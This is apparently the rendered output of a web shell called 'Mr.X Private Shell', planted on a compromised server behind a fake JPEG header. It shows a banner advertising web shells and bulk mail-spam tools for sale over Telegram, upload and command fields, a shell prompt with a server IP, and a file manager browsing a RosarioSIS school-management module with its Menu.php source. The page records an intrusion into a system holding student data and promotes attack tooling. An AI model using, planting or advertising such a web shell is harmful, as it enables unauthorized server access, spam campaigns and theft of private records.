����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eblama1@216.73.217.57: ~ $
<?php
/**
 * Eligibility module Menu entries
 *
 * @uses $menu global var
 *
 * @see  Menu.php in root folder
 *
 * @package RosarioSIS
 * @subpackage modules
 */

$menu['Eligibility']['admin'] = [
	'title' => _( 'Activities' ),
	'default' => 'Eligibility/Student.php',
	'Eligibility/Student.php' => _( 'Student Screen' ),
	'Eligibility/AddActivity.php' => _( 'Add Activity' ),
	1 => _( 'Reports' ),
	'Eligibility/StudentList.php' => _( 'Student List' ),
	'Eligibility/TeacherCompletion.php' => _( 'Teacher Completion' ),
	2 => _( 'Setup' ),
	'Eligibility/Activities.php' => _( 'Activities' ),
	'Eligibility/EntryTimes.php' => _( 'Entry Times' )
] + issetVal( $menu['Eligibility']['admin'], [] );

$menu['Eligibility']['teacher'] = [
	'title' => _( 'Activities' ),
	'default' => 'Eligibility/EnterEligibility.php',
	'Eligibility/EnterEligibility.php' => _( 'Enter Eligibility' )
] + issetVal( $menu['Eligibility']['teacher'], [] );

$menu['Eligibility']['parent'] = [
	'title' => _( 'Activities' ),
	'default' => 'Eligibility/Student.php',
	'Eligibility/Student.php' => _( 'Student Screen' ),
	'Eligibility/StudentList.php' => _( 'Student List' )
] + issetVal( $menu['Eligibility']['parent'], [] );

if ( $RosarioModules['Users'] )
{
	$menu['Users']['admin']['Users/TeacherPrograms.php&include=Eligibility/EnterEligibility.php'] = _( 'Enter Eligibility' );

	$exceptions['Users']['Users/TeacherPrograms.php&include=Eligibility/EnterEligibility.php'] = true;
}

$exceptions['Eligibility'] = [
	'Eligibility/AddActivity.php' => true
];

Filemanager

Name Type Size Permission Actions
includes Folder 0755
Activities.php File 2.82 KB 0644
AddActivity.php File 2.77 KB 0644
EnterEligibility.php File 11.14 KB 0644
EntryTimes.php File 2.69 KB 0644
Menu.php File 1.5 KB 0644
Student.php File 6.4 KB 0644
StudentList.php File 3.5 KB 0644
TeacherCompletion.php File 6.31 KB 0644